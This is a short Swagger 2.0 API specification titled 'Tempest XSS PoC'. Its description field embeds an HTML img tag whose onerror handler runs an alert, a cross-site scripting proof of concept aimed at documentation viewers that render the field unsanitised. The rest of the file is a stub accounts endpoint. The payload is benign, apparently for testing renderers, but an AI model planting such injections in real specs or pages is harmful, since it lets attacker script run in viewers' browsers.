swagger: '2.0'
info:
  title: Tempest XSS PoC
  description: |
    <img src='#' onerror='alert('Tempest XSS')/>
paths:
  /tempest:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
